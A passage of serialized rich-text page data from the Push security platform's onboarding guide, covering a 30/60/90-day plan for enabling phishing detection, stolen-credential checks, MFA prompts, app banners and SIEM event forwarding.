",[],{},{"nodeType":173,"value":24345,"marks":156207,"data":156209},[156208],{"type":370},{},{"nodeType":173,"value":1477,"marks":156211,"data":156212},[],{},{"nodeType":312,"data":156214,"content":156218},{"target":156215},{"sys":156216},{"id":156217,"type":317,"linkType":318},"2ylIkR0JXHkFStGuCFRjlN",[],{"nodeType":250,"data":156220,"content":156221},{},[156222,156261,156271,156281],{"nodeType":254,"data":156223,"content":156224},{},[156225],{"nodeType":178,"data":156226,"content":156227},{},[156228,156231,156235,156239,156243,156247,156251,156254,156258],{"nodeType":173,"value":2785,"marks":156229,"data":156230},[],{},{"nodeType":173,"value":18649,"marks":156232,"data":156234},[156233],{"type":370},{},{"nodeType":173,"value":156236,"marks":156237,"data":156238}," page in the Push admin console, select ",[],{},{"nodeType":173,"value":24345,"marks":156240,"data":156242},[156241],{"type":370},{},{"nodeType":173,"value":156244,"marks":156245,"data":156246}," and set the mode to ",[],{},{"nodeType":173,"value":2740,"marks":156248,"data":156250},[156249],{"type":370},{},{"nodeType":173,"value":1464,"marks":156252,"data":156253},[],{},{"nodeType":173,"value":2748,"marks":156255,"data":156257},[156256],{"type":370},{},{"nodeType":173,"value":1477,"marks":156259,"data":156260},[],{},{"nodeType":254,"data":156262,"content":156263},{},[156264],{"nodeType":178,"data":156265,"content":156266},{},[156267],{"nodeType":173,"value":156268,"marks":156269,"data":156270},"Customize the message that employees will see if they encounter a malicious site.",[],{},{"nodeType":254,"data":156272,"content":156273},{},[156274],{"nodeType":178,"data":156275,"content":156276},{},[156277],{"nodeType":173,"value":156278,"marks":156279,"data":156280},"Add domains to the ignore list if you wish to ignore enforcing the control on specific domains or encounter any domains that trigger false positives.",[],{},{"nodeType":254,"data":156282,"content":156283},{},[156284],{"nodeType":178,"data":156285,"content":156286},{},[156287,156291,156295],{"nodeType":173,"value":156288,"marks":156289,"data":156290},"You can monitor the ",[],{},{"nodeType":173,"value":2718,"marks":156292,"data":156294},[156293],{"type":370},{},{"nodeType":173,"value":156296,"marks":156297,"data":156298}," page (or send Push events to an external SIEM or SOAR) to see when the control is triggered.",[],{},{"nodeType":178,"data":156300,"content":156301},{},[156302],{"nodeType":173,"value":156303,"marks":156304,"data":156305},"You may also wish to communicate with your end-users to let them know you’re enabling a new security protection to stop phishing attacks and that if they encounter a malicious site, they’ll see a warning.",[],{},{"nodeType":235,"data":156307,"content":156308},{},[156309],{"nodeType":173,"value":156310,"marks":156311,"data":156312},"Check for verified stolen credentials",[],{},{"nodeType":178,"data":156314,"content":156315},{},[156316,156320,156328,156332,156337,156341,156345],{"nodeType":173,"value":156317,"marks":156318,"data":156319},"Push uses threat intelligence sources to compare suspected ",[],{},{"nodeType":1698,"data":156321,"content":156324},{"target":156322},{"sys":156323},{"id":24713,"type":317,"linkType":318},[156325],{"nodeType":173,"value":24636,"marks":156326,"data":156327},[],{},{"nodeType":173,"value":156329,"marks":156330,"data":156331}," to those still actively in use across your workforce identities. You don’t need to configure anything for this feature, and you can check for any verified true positives by viewing the ",[],{},{"nodeType":173,"value":156333,"marks":156334,"data":156336},"Vulnerable identities",[156335],{"type":370},{},{"nodeType":173,"value":156338,"marks":156339,"data":156340}," section of the ",[],{},{"nodeType":173,"value":65430,"marks":156342,"data":156344},[156343],{"type":370},{},{"nodeType":173,"value":2340,"marks":156346,"data":156347},[],{},{"nodeType":178,"data":156349,"content":156350},{},[156351],{"nodeType":173,"value":156352,"marks":156353,"data":156354},"We recommend investigating immediately and taking action to remediate any accounts with verified stolen credentials.",[],{},{"nodeType":312,"data":156356,"content":156359},{"target":156357},{"sys":156358},{"id":148649,"type":317,"linkType":318},[],{"nodeType":235,"data":156361,"content":156362},{},[156363],{"nodeType":173,"value":156364,"marks":156365,"data":156366},"Enable additional security controls in Monitor mode",[],{},{"nodeType":178,"data":156368,"content":156369},{},[156370,156374,156378],{"nodeType":173,"value":156371,"marks":156372,"data":156373},"Next, set up additional security controls in ",[],{},{"nodeType":173,"value":2701,"marks":156375,"data":156377},[156376],{"type":370},{},{"nodeType":173,"value":156379,"marks":156380,"data":156381}," mode so you can begin finetuning your configuration or adding to ignore lists. A few details to keep in mind:",[],{},{"nodeType":250,"data":156383,"content":156384},{},[156385,156423,156446,156469],{"nodeType":254,"data":156386,"content":156387},{},[156388],{"nodeType":178,"data":156389,"content":156390},{},[156391,156396,156400,156411,156415,156419],{"nodeType":173,"value":156392,"marks":156393,"data":156395},"For all controls",[156394],{"type":370},{},{"nodeType":173,"value":156397,"marks":156398,"data":156399},", update your ",[],{},{"nodeType":1698,"data":156401,"content":156405},{"target":156402},{"sys":156403},{"id":156404,"type":317,"linkType":318},"2q4iZicL3D85XGTsYZ5mgK",[156406],{"nodeType":173,"value":156407,"marks":156408,"data":156410},"Custom login URLs",[156409],{"type":370},{},{"nodeType":173,"value":156412,"marks":156413,"data":156414}," list on the ",[],{},{"nodeType":173,"value":2789,"marks":156416,"data":156418},[156417],{"type":370},{},{"nodeType":173,"value":156420,"marks":156421,"data":156422}," page to include any custom URLs you use for your identity provider or other important apps, so that Push can correctly identify those logins as belonging to your IdP (or other app).",[],{},{"nodeType":254,"data":156424,"content":156425},{},[156426],{"nodeType":178,"data":156427,"content":156428},{},[156429,156434,156438,156442],{"nodeType":173,"value":156430,"marks":156431,"data":156433},"For SSO password protection",[156432],{"type":370},{},{"nodeType":173,"value":156435,"marks":156436,"data":156437},", we recommend starting in ",[],{},{"nodeType":173,"value":2701,"marks":156439,"data":156441},[156440],{"type":370},{},{"nodeType":173,"value":156443,"marks":156444,"data":156445}," so you can identify any sites in your environment that cause false positives, such as sites that are configured to legitimately allow use of SSO credentials. Then add these sites to your ignore list. By running in monitor mode for a few weeks, you can also get a sense of how often employees are reusing their corporate IdP credentials on other sites where they shouldn’t, such as personal apps.",[],{},{"nodeType":254,"data":156447,"content":156448},{},[156449],{"nodeType":178,"data":156450,"content":156451},{},[156452,156457,156461,156465],{"nodeType":173,"value":156453,"marks":156454,"data":156456},"For cloned login page detection",[156455],{"type":370},{},{"nodeType":173,"value":156458,"marks":156459,"data":156460},", set the mode to ",[],{},{"nodeType":173,"value":2701,"marks":156462,"data":156464},[156463],{"type":370},{},{"nodeType":173,"value":156466,"marks":156467,"data":156468}," to receive events when employees visit a site using a cloned login screen for important apps including your identity provider.",[],{},{"nodeType":254,"data":156470,"content":156471},{},[156472],{"nodeType":178,"data":156473,"content":156474},{},[156475,156480,156484,156488],{"nodeType":173,"value":156476,"marks":156477,"data":156479},"For URL blocking",[156478],{"type":370},{},{"nodeType":173,"value":156481,"marks":156482,"data":156483},", test a blocked URL or begin compiling a list of URLs you wish to block, such as AiTM sites discovered through phishing sites you find while using the ",[],{},{"nodeType":173,"value":24345,"marks":156485,"data":156487},[156486],{"type":370},{},{"nodeType":173,"value":156489,"marks":156490,"data":156491}," feature.",[],{},{"nodeType":178,"data":156493,"content":156494},{},[156495,156499,156503,156507,156512],{"nodeType":173,"value":156496,"marks":156497,"data":156498},"To see events generated by these controls, filter the ",[],{},{"nodeType":173,"value":2718,"marks":156500,"data":156502},[156501],{"type":370},{},{"nodeType":173,"value":156504,"marks":156505,"data":156506}," page. Go to the filters icon, then select ",[],{},{"nodeType":173,"value":156508,"marks":156509,"data":156511},"Events > By type",[156510],{"type":370},{},{"nodeType":173,"value":156513,"marks":156514,"data":156515}," from the dropdown and choose the specific control to see associated events.",[],{},{"nodeType":312,"data":156517,"content":156521},{"target":156518},{"sys":156519},{"id":156520,"type":317,"linkType":318},"2M0Cjc2Wo9L7c9rIQebx0S",[],{"nodeType":235,"data":156523,"content":156524},{},[156525],{"nodeType":173,"value":156526,"marks":156527,"data":156528},"Set up alerts for your security team",[],{},{"nodeType":178,"data":156530,"content":156531},{},[156532,156536,156541],{"nodeType":173,"value":156533,"marks":156534,"data":156535},"Push can send notifications of interesting employee activity to a Microsoft Teams or Slack channel so you can stay on top of new apps and account security findings. In the admin console, go to the ",[],{},{"nodeType":173,"value":156537,"marks":156538,"data":156540},"ChatOps",[156539],{"type":370},{},{"nodeType":173,"value":156542,"marks":156543,"data":156544}," page and integrate your Teams or Slack instance, then enable topics you wish to get notified about.",[],{},{"nodeType":312,"data":156546,"content":156550},{"target":156547},{"sys":156548},{"id":156549,"type":317,"linkType":318},"OObhJQA1HMcmwBvpWfmC7",[],{"nodeType":231,"data":156552,"content":156553},{},[],{"nodeType":169,"data":156555,"content":156556},{},[156557],{"nodeType":173,"value":156558,"marks":156559,"data":156560},"First 60 days: Go (threat) hunting",[],{},{"nodeType":178,"data":156562,"content":156563},{},[156564],{"nodeType":173,"value":156565,"marks":156566,"data":156567},"Now you’re ready to survey the landscape and see where there are dangers hiding among your workforce identities such as missing MFA or SSO, unused accounts, compromised passwords, and unsanctioned or untrustworthy apps and integrations. ",[],{},{"nodeType":178,"data":156569,"content":156570},{},[156571,156575,156579],{"nodeType":173,"value":156572,"marks":156573,"data":156574},"Luckily, Push doesn’t make you forage for the important information. Use the ",[],{},{"nodeType":173,"value":65430,"marks":156576,"data":156578},[156577],{"type":370},{},{"nodeType":173,"value":156580,"marks":156581,"data":156582}," in the Push admin console to pinpoint vulnerable identities and see SSO trends and other insights.",[],{},{"nodeType":178,"data":156584,"content":156585},{},[156586],{"nodeType":173,"value":156587,"marks":156588,"data":156589},"After getting a baseline understanding of your ecosystem, you can begin translating your security policies into actionable controls by preparing end-users and creating the foundation for control configuration rules.",[],{},{"nodeType":178,"data":156591,"content":156592},{},[156593],{"nodeType":173,"value":156594,"marks":156595,"data":156596},"Here’s what we recommend for your second month using Push:",[],{},{"nodeType":235,"data":156598,"content":156599},{},[156600],{"nodeType":173,"value":156601,"marks":156602,"data":156603},"Understand which identities are most vulnerable to account takeover",[],{},{"nodeType":178,"data":156605,"content":156606},{},[156607,156611,156615,156619,156623],{"nodeType":173,"value":156608,"marks":156609,"data":156610},"On the ",[],{},{"nodeType":173,"value":65430,"marks":156612,"data":156614},[156613],{"type":370},{},{"nodeType":173,"value":156616,"marks":156617,"data":156618},", you can identify which identities are most at risk because they use a leaked, reused, or weak password and lack MFA by referencing the ",[],{},{"nodeType":173,"value":156333,"marks":156620,"data":156622},[156621],{"type":370},{},{"nodeType":173,"value":156624,"marks":156625,"data":156626}," section.",[],{},{"nodeType":178,"data":156628,"content":156629},{},[156630,156635,156639,156644],{"nodeType":173,"value":156631,"marks":156632,"data":156634},"Tip: ",[156633],{"type":370},{},{"nodeType":173,"value":156636,"marks":156637,"data":156638},"Toggle the view to ",[],{},{"nodeType":173,"value":156640,"marks":156641,"data":156643},"All identities",[156642],{"type":370},{},{"nodeType":173,"value":156645,"marks":156646,"data":156647}," if you are not yet using the sensitivity labels for apps to get a full picture of your data.",[],{},{"nodeType":312,"data":156649,"content":156653},{"target":156650},{"sys":156651},{"id":156652,"type":317,"linkType":318},"4xPy4cr18jk7JV7TWqnmoy",[],{"nodeType":178,"data":156655,"content":156656},{},[156657],{"nodeType":173,"value":156658,"marks":156659,"data":156660},"Select each slice of the chart to go to a filtered list of the accounts with those security issues. You can then evaluate which accounts pose the biggest risk, whether they belong to high-sensitivity apps or high-value roles, such as admins or executives, or whether there are any data patterns, such as a cluster of account issues that belong to specific teams, that will help you decide on a remediation strategy.",[],{},{"nodeType":178,"data":156662,"content":156663},{},[156664],{"nodeType":173,"value":156665,"marks":156666,"data":156667},"As mentioned earlier, we recommend taking immediate action for any accounts with verified stolen credentials, especially those that also lack MFA protection.",[],{},{"nodeType":235,"data":156669,"content":156670},{},[156671],{"nodeType":173,"value":156672,"marks":156673,"data":156674},"Check your SSO coverage",[],{},{"nodeType":178,"data":156676,"content":156677},{},[156678,156682,156687],{"nodeType":173,"value":156679,"marks":156680,"data":156681},"On the Dashboard, you can also start to see your ",[],{},{"nodeType":173,"value":156683,"marks":156684,"data":156686},"SSO trends",[156685],{"type":370},{},{"nodeType":173,"value":156688,"marks":156689,"data":156690},". Use this section of the dashboard to see a breakdown of login methods for your accounts (SAML, OIDC, or non-SSO).",[],{},{"nodeType":312,"data":156692,"content":156696},{"target":156693},{"sys":156694},{"id":156695,"type":317,"linkType":318},"6GbX5cV4wOerwFeqKKAolC",[],{"nodeType":178,"data":156698,"content":156699},{},[156700,156704,156708,156712,156717,156721,156730],{"nodeType":173,"value":156701,"marks":156702,"data":156703},"You can look at more granular information on the ",[],{},{"nodeType":173,"value":71581,"marks":156705,"data":156707},[156706],{"type":370},{},{"nodeType":173,"value":156709,"marks":156710,"data":156711}," page by filtering by ",[],{},{"nodeType":173,"value":156713,"marks":156714,"data":156716},"Login method",[156715],{"type":370},{},{"nodeType":173,"value":156718,"marks":156719,"data":156720},". For example, you may wish to view accounts that have used both password and SAML login methods to identify local accounts on high-value apps that should be using SSO only — otherwise known as ",[],{},{"nodeType":1698,"data":156722,"content":156726},{"target":156723},{"sys":156724},{"id":156725,"type":317,"linkType":318},"174u87EYeKMKHzYYxBLlHO",[156727],{"nodeType":173,"value":835,"marks":156728,"data":156729},[],{},{"nodeType":173,"value":1477,"marks":156731,"data":156732},[],{},{"nodeType":312,"data":156734,"content":156738},{"target":156735},{"sys":156736},{"id":156737,"type":317,"linkType":318},"68Sfs2MmpkdISb4rnoTCzW",[],{"nodeType":235,"data":156740,"content":156741},{},[156742],{"nodeType":173,"value":156743,"marks":156744,"data":156745},"Review patterns in employee activity",[],{},{"nodeType":178,"data":156747,"content":156748},{},[156749,156752,156756,156759,156763,156766,156770],{"nodeType":173,"value":2566,"marks":156750,"data":156751},[],{},{"nodeType":173,"value":71552,"marks":156753,"data":156755},[156754],{"type":370},{},{"nodeType":173,"value":2936,"marks":156757,"data":156758},[],{},{"nodeType":173,"value":83669,"marks":156760,"data":156762},[156761],{"type":370},{},{"nodeType":173,"value":9534,"marks":156764,"data":156765},[],{},{"nodeType":173,"value":71581,"marks":156767,"data":156769},[156768],{"type":370},{},{"nodeType":173,"value":156771,"marks":156772,"data":156773}," pages, you can then get a sense of which apps employees are accessing, using which login methods, whether they’re registered for MFA (and which MFA methods are registered on the account), whether they’re using a password manager, and where there are account security issues such as weak, reused, or shared passwords.",[],{},{"nodeType":178,"data":156775,"content":156776},{},[156777,156782],{"nodeType":173,"value":156778,"marks":156779,"data":156781},"Tip:",[156780],{"type":370},{},{"nodeType":173,"value":156783,"marks":156784,"data":156785}," Use the filters on these pages to zero in on issues of interest, such as password logins, account security findings, or weak MFA methods.",[],{},{"nodeType":235,"data":156787,"content":156788},{},[156789],{"nodeType":173,"value":156790,"marks":156791,"data":156792},"Put your security policies into practice",[],{},{"nodeType":178,"data":156794,"content":156795},{},[156796],{"nodeType":173,"value":156797,"marks":156798,"data":156799},"Equipped with this context, now you’re ready to lay the foundation for remediation and blocking controls, putting your security policies into practice.",[],{},{"nodeType":178,"data":156801,"content":156802},{},[156803],{"nodeType":173,"value":156804,"marks":156805,"data":156806},"At this stage, we recommend that you:",[],{},{"nodeType":250,"data":156808,"content":156809},{},[156810,156837,156847],{"nodeType":254,"data":156811,"content":156812},{},[156813],{"nodeType":178,"data":156814,"content":156815},{},[156816,156820,156825,156828,156833],{"nodeType":173,"value":156817,"marks":156818,"data":156819},"Set the ",[],{},{"nodeType":173,"value":156821,"marks":156822,"data":156824},"Approval status",[156823],{"type":370},{},{"nodeType":173,"value":933,"marks":156826,"data":156827},[],{},{"nodeType":173,"value":156829,"marks":156830,"data":156832},"Sensitivity level",[156831],{"type":370},{},{"nodeType":173,"value":156834,"marks":156835,"data":156836}," of your apps using the provided categories in Push.",[],{},{"nodeType":254,"data":156838,"content":156839},{},[156840],{"nodeType":178,"data":156841,"content":156842},{},[156843],{"nodeType":173,"value":156844,"marks":156845,"data":156846},"Create employee groups (which can be done manually or via API to match your existing directory groups) and assign employees to them based on department or job function.",[],{},{"nodeType":254,"data":156848,"content":156849},{},[156850],{"nodeType":178,"data":156851,"content":156852},{},[156853],{"nodeType":173,"value":156854,"marks":156855,"data":156856},"Create custom labels for apps as needed.",[],{},{"nodeType":178,"data":156858,"content":156859},{},[156860],{"nodeType":173,"value":156861,"marks":156862,"data":156863},"By adding this metadata, you’ll be able to use these classifications when configuring rules for how to apply your desired security controls.",[],{},{"nodeType":312,"data":156865,"content":156869},{"target":156866},{"sys":156867},{"id":156868,"type":317,"linkType":318},"pCIPMrpBAWlmqFoKxTL8P",[],{"nodeType":178,"data":156871,"content":156872},{},[156873],{"nodeType":173,"value":156874,"marks":156875,"data":156876},"Before enabling end-user remediation and blocking controls, which we cover in the next section, you may also wish to let your employees know what they should expect to see in terms of self-remediation workflows or other employee-facing guidance in their browser.",[],{},{"nodeType":231,"data":156878,"content":156879},{},[],{"nodeType":169,"data":156881,"content":156882},{},[156883],{"nodeType":173,"value":156884,"marks":156885,"data":156886},"First 90 days: Remediate issues and arrive safely",[],{},{"nodeType":178,"data":156888,"content":156889},{},[156890],{"nodeType":173,"value":156891,"marks":156892,"data":156893},"With your team prepared and your rifle well-oiled, you’re ready to pick off security issues like SSO password phishing; missing MFA; and use of unsanctioned apps.",[],{},{"nodeType":178,"data":156895,"content":156896},{},[156897],{"nodeType":173,"value":156898,"marks":156899,"data":156900},"Here’s what we recommend for your third month using Push:",[],{},{"nodeType":235,"data":156902,"content":156903},{},[156904],{"nodeType":173,"value":156905,"marks":156906,"data":156907},"Move security controls out of Monitor mode to Warn or Block",[],{},{"nodeType":178,"data":156909,"content":156910},{},[156911,156915,156919,156923,156927,156930,156934,156938,156942,156946,156950,156953,156957],{"nodeType":173,"value":156912,"marks":156913,"data":156914},"Once you’ve informed your employees and curated your ignore list, you’re ready to move security controls such as ",[],{},{"nodeType":173,"value":125683,"marks":156916,"data":156918},[156917],{"type":370},{},{"nodeType":173,"value":156920,"marks":156921,"data":156922}," into ",[],{},{"nodeType":173,"value":2740,"marks":156924,"data":156926},[156925],{"type":370},{},{"nodeType":173,"value":1464,"marks":156928,"data":156929},[],{},{"nodeType":173,"value":2748,"marks":156931,"data":156933},[156932],{"type":370},{},{"nodeType":173,"value":156935,"marks":156936,"data":156937}," mode. (If you have not already set the ",[],{},{"nodeType":173,"value":24345,"marks":156939,"data":156941},[156940],{"type":370},{},{"nodeType":173,"value":156943,"marks":156944,"data":156945}," control to ",[],{},{"nodeType":173,"value":2740,"marks":156947,"data":156949},[156948],{"type":370},{},{"nodeType":173,"value":1464,"marks":156951,"data":156952},[],{},{"nodeType":173,"value":2748,"marks":156954,"data":156956},[156955],{"type":370},{},{"nodeType":173,"value":156958,"marks":156959,"data":156960},", now is also a good time to do that.)",[],{},{"nodeType":178,"data":156962,"content":156963},{},[156964,156967,156971],{"nodeType":173,"value":2785,"marks":156965,"data":156966},[],{},{"nodeType":173,"value":18649,"marks":156968,"data":156970},[156969],{"type":370},{},{"nodeType":173,"value":156972,"marks":156973,"data":156974}," page of the admin console:",[],{},{"nodeType":250,"data":156976,"content":156977},{},[156978,156995,157005,157015],{"nodeType":254,"data":156979,"content":156980},{},[156981],{"nodeType":178,"data":156982,"content":156983},{},[156984,156988,156992],{"nodeType":173,"value":156985,"marks":156986,"data":156987},"Open the tile for the given control and update the ",[],{},{"nodeType":173,"value":19371,"marks":156989,"data":156991},[156990],{"type":370},{},{"nodeType":173,"value":1477,"marks":156993,"data":156994},[],{},{"nodeType":254,"data":156996,"content":156997},{},[156998],{"nodeType":178,"data":156999,"content":157000},{},[157001],{"nodeType":173,"value":157002,"marks":157003,"data":157004},"Create a custom message that employees will see when the control is triggered.",[],{},{"nodeType":254,"data":157006,"content":157007},{},[157008],{"nodeType":178,"data":157009,"content":157010},{},[157011],{"nodeType":173,"value":157012,"marks":157013,"data":157014},"Save the configuration.",[],{},{"nodeType":254,"data":157016,"content":157017},{},[157018],{"nodeType":178,"data":157019,"content":157020},{},[157021],{"nodeType":173,"value":157022,"marks":157023,"data":157024},"If possible, we also recommend consuming the webhook events generated when these controls are triggered in your SIEM or other alerting platform so you have good visibility.",[],{},{"nodeType":178,"data":157026,"content":157027},{},[157028,157032,157036,157039,157043,157047,157052],{"nodeType":173,"value":157029,"marks":157030,"data":157031},"If you’ve found any malicious sites using the ",[],{},{"nodeType":173,"value":24345,"marks":157033,"data":157035},[157034],{"type":370},{},{"nodeType":173,"value":1464,"marks":157037,"data":157038},[],{},{"nodeType":173,"value":24353,"marks":157040,"data":157042},[157041],{"type":370},{},{"nodeType":173,"value":157044,"marks":157045,"data":157046}," control, you may also wish to update your blocklist using the ",[],{},{"nodeType":173,"value":157048,"marks":157049,"data":157051},"URL blocking",[157050],{"type":370},{},{"nodeType":173,"value":157053,"marks":157054,"data":157055}," control. ",[],{},{"nodeType":235,"data":157057,"content":157058},{},[157059],{"nodeType":173,"value":157060,"marks":157061,"data":157062},"Implement banners to guide secure employee behavior",[],{},{"nodeType":178,"data":157064,"content":157065},{},[157066,157070,157074,157078,157083,157086,157091,157094,157099,157102,157106,157110,157114,157118,157123],{"nodeType":173,"value":157067,"marks":157068,"data":157069},"Depending on your security goals, you may want to implement in-browser guidance for employees in the form of ",[],{},{"nodeType":173,"value":2631,"marks":157071,"data":157073},[157072],{"type":370},{},{"nodeType":173,"value":157075,"marks":157076,"data":157077},". You can configure a banner in ",[],{},{"nodeType":173,"value":157079,"marks":157080,"data":157082},"Inform",[157081],{"type":370},{},{"nodeType":173,"value":2936,"marks":157084,"data":157085},[],{},{"nodeType":173,"value":157087,"marks":157088,"data":157090},"Acknowledge",[157089],{"type":370},{},{"nodeType":173,"value":2936,"marks":157092,"data":157093},[],{},{"nodeType":173,"value":157095,"marks":157096,"data":157098},"Reason",[157097],{"type":370},{},{"nodeType":173,"value":3949,"marks":157100,"data":157101},[],{},{"nodeType":173,"value":2748,"marks":157103,"data":157105},[157104],{"type":370},{},{"nodeType":173,"value":157107,"marks":157108,"data":157109}," modes from the ",[],{},{"nodeType":173,"value":18649,"marks":157111,"data":157113},[157112],{"type":370},{},{"nodeType":173,"value":157115,"marks":157116,"data":157117}," page. Use the ",[],{},{"nodeType":173,"value":157119,"marks":157120,"data":157122},"Rules",[157121],{"type":370},{},{"nodeType":173,"value":157124,"marks":157125,"data":157126}," feature to specify which employees or employee groups should see a banner, and which apps to apply it to.",[],{},{"nodeType":312,"data":157128,"content":157132},{"target":157129},{"sys":157130},{"id":157131,"type":317,"linkType":318},"2rVWMTYrjShEdrswkzobJe",[],{"nodeType":178,"data":157134,"content":157135},{},[157136],{"nodeType":173,"value":157137,"marks":157138,"data":157139},"Common use cases include:",[],{},{"nodeType":250,"data":157141,"content":157142},{},[157143,157153,157163,157173,157183],{"nodeType":254,"data":157144,"content":157145},{},[157146],{"nodeType":178,"data":157147,"content":157148},{},[157149],{"nodeType":173,"value":157150,"marks":157151,"data":157152},"Blocking an app while you investigate a potential data breach.",[],{},{"nodeType":254,"data":157154,"content":157155},{},[157156],{"nodeType":178,"data":157157,"content":157158},{},[157159],{"nodeType":173,"value":157160,"marks":157161,"data":157162},"Blocking unapproved apps, such as a file-sharing service that’s not approved for storing sensitive information.",[],{},{"nodeType":254,"data":157164,"content":157165},{},[157166],{"nodeType":178,"data":157167,"content":157168},{},[157169],{"nodeType":173,"value":157170,"marks":157171,"data":157172},"Requiring employees to acknowledge your GenAI policy before using GenAI apps.",[],{},{"nodeType":254,"data":157174,"content":157175},{},[157176],{"nodeType":178,"data":157177,"content":157178},{},[157179],{"nodeType":173,"value":157180,"marks":157181,"data":157182},"Reminding employees to use SSO for SAML-enabled apps rather than a local account password.",[],{},{"nodeType":254,"data":157184,"content":157185},{},[157186],{"nodeType":178,"data":157187,"content":157188},{},[157189],{"nodeType":173,"value":157190,"marks":157191,"data":157192},"Asking employees not to use an app before it can be reviewed by the security team, for apps not yet in your inventory.",[],{},{"nodeType":178,"data":157194,"content":157195},{},[157196,157200,157204,157208],{"nodeType":173,"value":156778,"marks":157197,"data":157199},[157198],{"type":370},{},{"nodeType":173,"value":157201,"marks":157202,"data":157203}," You can monitor employee engagement with app banners on the ",[],{},{"nodeType":173,"value":2718,"marks":157205,"data":157207},[157206],{"type":370},{},{"nodeType":173,"value":157209,"marks":157210,"data":157211}," page and send webhook events for when a banner is displayed or interacted with to your SIEM or SOAR.",[],{},{"nodeType":235,"data":157213,"content":157214},{},[157215],{"nodeType":173,"value":157216,"marks":157217,"data":157218},"Enforce MFA on high-value apps",[],{},{"nodeType":178,"data":157220,"content":157221},{},[157222,157226,157230],{"nodeType":173,"value":157223,"marks":157224,"data":157225},"If you’ve identified accounts on important apps that lack MFA, you can prompt employees to add an MFA method using ",[],{},{"nodeType":173,"value":2570,"marks":157227,"data":157229},[157228],{"type":370},{},{"nodeType":173,"value":157231,"marks":157232,"data":157233},". This control uses an in-browser message to direct employees to register for MFA on apps where they lack it. This control is enabled on a per-app basis, so you can decide where you want to prompt for MFA registration.",[],{},{"nodeType":250,"data":157235,"content":157236},{},[157237,157262],{"nodeType":254,"data":157238,"content":157239},{},[157240],{"nodeType":178,"data":157241,"content":157242},{},[157243,157246,157250,157254,157258],{"nodeType":173,"value":2785,"marks":157244,"data":157245},[],{},{"nodeType":173,"value":18649,"marks":157247,"data":157249},[157248],{"type":370},{},{"nodeType":173,"value":157251,"marks":157252,"data":157253}," page, select the ",[],{},{"nodeType":173,"value":2570,"marks":157255,"data":157257},[157256],{"type":370},{},{"nodeType":173,"value":157259,"marks":157260,"data":157261}," tile.",[],{},{"nodeType":254,"data":157263,"content":157264},{},[157265],{"nodeType":178,"data":157266,"content":157267},{},[157268],{"nodeType":173,"value":157269,"marks":157270,"data":157271},"Customize the message to employees, if you like.",[],{},{"nodeType":178,"data":157273,"content":157274},{},[157275],{"nodeType":173,"value":157276,"marks":157277,"data":157278},"image",[],{},{"nodeType":235,"data":157280,"content":157281},{},[157282],{"nodeType":173,"value":157283,"marks":157284,"data":157285},"Send events to your SIEM or SOAR",[],{},{"nodeType":178,"data":157287,"content":157288},{},[157289],{"nodeType":173,"value":157290,"marks":157291,"data":157292},"To stay informed about end-user activity, findings, and controls on the Push platform, we recommend consuming events important to your security strategy in your SIEM, SOAR, or other similar alerting or automation platform.",[],{},{"nodeType":178,"data":157294,"content":157295},{},[157296,157300,157304,157308,157315],{"nodeType":173,"value":157297,"marks":157298,"data":157299},"Use the ",[],{},{"nodeType":173,"value":2718,"marks":157301,"data":157303},[157302],{"type":370},{},{"nodeType":173,"value":157305,"marks":157306,"data":157307}," page in the admin console to get familiar with the data structure of events, as well as the volume of events, and then review our ",[],{},{"nodeType":186,"data":157309,"content":157310},{"uri":2333},[157311],{"nodeType":173,"value":157312,"marks":157313,"data":157314},"REST API and webhooks documentation",[],{},{"nodeType":173,"value":157316,"marks":157317,"data":157318}," for details on which entities, activities, control events, and audit logs you can consume.",[],{},{"nodeType":312,"data":157320,"content":157324},{"target":157321},{"sys":157322},{"id":157323,"type":317,"linkType":318},"1oG13vQ3AGP5i6TD24dnjs",[],{"nodeType":231,"data":157326,"content":157327},{},[],{"nodeType":169,"data":157329,"content":157330},{},[157331],{"nodeType":173,"value":157332,"marks":157333,"data":157334},"Next: Chart your own course",[],{},{"nodeType":178,"data":157336,"content":157337},{},[157338],{"nodeType":173,"value":157339,"marks":157340,"data":157341},"In your first 90 days and beyond, you can also begin creating custom workflows in your SIEM or SOAR platform to take Push’s browser and user activity telemetry and transform it into the triggers for solving specific problems in your environment.",[],{},{"nodeType":178,"data":157343,"content":157344},{},[157345],{"nodeType":173,"value":157346,"marks":157347,"data":157348},"Here are some ideas for what you can accomplish using Push’s REST API and webhooks:",[],{},{"nodeType":250,"data":157350,"content":157351},{},[157352,157367,157382,157397,157412,157431,157446],{"nodeType":254,"data":157353,"content":157354},{},[157355],{"nodeType":178,"data":157356,"content":157357},{},[157358,157363],{"nodeType":173,"value":157359,"marks":157360,"data":157362},"Harden identities and reduce account compromise",[157361],{"type":370},{},{"nodeType":173,"value":157364,"marks":157365,"data":157366},", such as alerting you when passwords are identified in public data breaches or when employees are using an unapproved app or when an SSO app is accessed via local account.",[],{},{"nodeType":254,"data":157368,"content":157369},{},[157370],{"nodeType":178,"data":157371,"content":157372},{},[157373,157378],{"nodeType":173,"value":157374,"marks":157375,"data":157377},"Monitor for suspicious activity or high-risk changes",[157376],{"type":370},{},{"nodeType":173,"value":157379,"marks":157380,"data":157381},", such as checking for MFA method changes, or flagging when employees reuse corporate SSO passwords or visit sites running phishing malware.",[],{},{"nodeType":254,"data":157383,"content":157384},{},[157385],{"nodeType":178,"data":157386,"content":157387},{},[157388,157393],{"nodeType":173,"value":157389,"marks":157390,"data":157392},"Investigate indicators of compromise",[157391],{"type":370},{},{"nodeType":173,"value":157394,"marks":157395,"data":157396},", such as correlating login events with platform logs, searching for recent signups to risky apps, or identifying post-compromise lateral movement opportunities.",[],{},{"nodeType":254,"data":157398,"content":157399},{},[157400],{"nodeType":178,"data":157401,"content":157402},{},[157403,157408],{"nodeType":173,"value":157404,"marks":157405,"data":157407},"Force-reset an IdP password",[157406],{"type":370},{},{"nodeType":173,"value":157409,"marks":157410,"data":157411}," if Push finds a compromised password on an employee account.",[],{},{"nodeType":254,"data":157413,"content":157414},{},[157415],{"nodeType":178,"data":157416,"content":157417},{},[157418,157422,157427],{"nodeType":173,"value":157419,"marks":157420,"data":157421},"Automate a workflow showing you all the",[],{},{"nodeType":173,"value":157423,"marks":157424,"data":157426}," accounts and apps used by an employee you’re offboarding",[157425],{"type":370},{},{"nodeType":173,"value":157428,"marks":157429,"data":157430},", and their account login methods.",[],{},{"nodeType":254,"data":157432,"content":157433},{},[157434],{"nodeType":178,"data":157435,"content":157436},{},[157437,157442],{"nodeType":173,"value":157438,"marks":157439,"data":157441},"Automate a workflow to revoke licenses",[157440],{"type":370},{},{"nodeType":173,"value":157443,"marks":157444,"data":157445}," on SaaS after a period of inactivity, 